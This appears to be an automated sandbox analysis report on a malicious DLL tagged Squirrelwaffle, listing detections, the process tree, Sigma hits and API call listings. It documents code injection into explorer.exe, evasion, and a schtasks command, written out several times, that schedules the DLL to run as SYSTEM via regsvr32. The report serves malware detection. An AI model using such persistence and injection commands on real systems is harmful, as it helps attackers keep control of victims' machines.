Play interactive tour

Edit tour

Windows Analysis Report ZBvNS77A7a.dll

Overview

General Information

Sample Name:	ZBvNS77A7a.dll
Analysis ID:	490262
MD5:	6484d8ffd4a6de7947534571e9907b4e
SHA1:	41e1cbd037698c3329db4edfe4e6b28b0654e94c
SHA256:	64a6039b2b3a347312f56170b5eb7deebe6d37ef6fb414fb929e84be4799dfa5
Tags:	dllSquirrelwaffle
Infos:
Most interesting Screenshot:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Writes to foreign memory regions

Machine Learning detection for sample

Allocates memory in foreign processes

Injects code into the Windows Explorer (explorer.exe)

Sigma detected: Regsvr32 Command Line Without DLL

Machine Learning detection for dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Checks if the current process is being debugged

Registers a DLL

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5756 cmdline: loaddll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 796 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6352 cmdline: rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

explorer.exe (PID: 5620 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 5616 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

schtasks.exe (PID: 6604 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37 MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 5912 cmdline: regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5944 cmdline: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)

WerFault.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

regsvr32.exe (PID: 7080 cmdline: regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5576 cmdline: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)

WerFault.exe (PID: 6788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Command Line Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll', ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 5944, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660, ProcessId: 1372

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37, ProcessId: 6604

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: ZBvNS77A7a.dll	Virustotal: Detection: 46%			Perma Link
Source: ZBvNS77A7a.dll	ReversingLabs: Detection: 60%

Machine Learning detection for sample

Show sources

Source: ZBvNS77A7a.dll

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\Desktop\ZBvNS77A7a.dll

Joe Sandbox ML: detected

Source: ZBvNS77A7a.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:	Binary string: ole32.pdb# source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.728766829.0000000003AC1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb$ source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbBa source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb) source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdbk source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb\|g source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb7 source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdbd_ source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: amstream.pdb source: explorer.exe, 00000004.00000003.702172421.0000000005361000.00000004.00000001.sdmp, explorer.exe, 00000005.00000003.702205579.0000000004F11000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000000.716853295.0000000010001000.00000020.00020000.sdmp, regsvr32.exe, 00000017.00000000.923266428.0000000010001000.00000020.00020000.sdmp, ZBvNS77A7a.dll.5.dr
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb5 source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbK source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: amstream.pdbGCTL source: explorer.exe, 00000004.00000003.702172421.0000000005361000.00000004.00000001.sdmp, explorer.exe, 00000005.00000003.702205579.0000000004F11000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000000.716853295.0000000010001000.00000020.00020000.sdmp, regsvr32.exe, 00000017.00000000.923266428.0000000010001000.00000020.00020000.sdmp, ZBvNS77A7a.dll.5.dr
Source:	Binary string: annjrqnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.764287027.0000000002C32000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000002.938813664.0000000002962000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbvm source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbH{ source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000AE9A FindFirstFileW,FindNextFileW,	0_2_1000AE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1000AE9A FindFirstFileW,FindNextFileW,	2_2_1000AE9A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0360AE9A FindFirstFileW,FindNextFileW,	4_2_0360AE9A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E5AE9A FindFirstFileW,FindNextFileW,	5_2_00E5AE9A

System Summary:

Source: ZBvNS77A7a.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBG

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_030919A1	0_2_030919A1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10016EC0	0_2_10016EC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10012351	0_2_10012351
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011763	0_2_10011763
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001538F	0_2_1001538F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10014FD0	0_2_10014FD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_045819A1	2_2_045819A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10016EC0	2_2_10016EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10012351	2_2_10012351
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10011763	2_2_10011763
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1001538F	2_2_1001538F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10014FD0	2_2_10014FD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_03611763	4_2_03611763
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_03612351	4_2_03612351
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_03614FD0	4_2_03614FD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0361538F	4_2_0361538F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_03616EC0	4_2_03616EC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E66EC0	5_2_00E66EC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E64FD0	5_2_00E64FD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E6538F	5_2_00E6538F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E61763	5_2_00E61763
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E62351	5_2_00E62351

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000C6CB NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	0_2_1000C6CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000CB82 memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	0_2_1000CB82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1000C6CB NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	2_2_1000C6CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1000CB82 memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	2_2_1000CB82

Source: ZBvNS77A7a.dll.5.dr	Static PE information: No import functions for PE file found
Source: ZBvNS77A7a.dll.4.dr	Static PE information: No import functions for PE file found

Source: ZBvNS77A7a.dll.5.dr

Binary or memory string: OriginalFilenameAMStream.dllj% vs ZBvNS77A7a.dll

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: ZBvNS77A7a.dll	Virustotal: Detection: 46%
Source: ZBvNS77A7a.dll	ReversingLabs: Detection: 60%

Source: ZBvNS77A7a.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 652
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Pzjqjshjoy

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF241.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.evad.winDLL@20/10@0/0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000D52E CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

0_2_1000D52E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000AB89 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,

0_2_1000AB89

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9A57D251-8185-479A-AC5F-1814AF591876}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{62D2F15B-1C9B-4191-87B4-71874D8982FF}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5944
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5576
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{62D2F15B-1C9B-4191-87B4-71874D8982FF}

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source:	Binary string: ole32.pdb# source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.728766829.0000000003AC1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
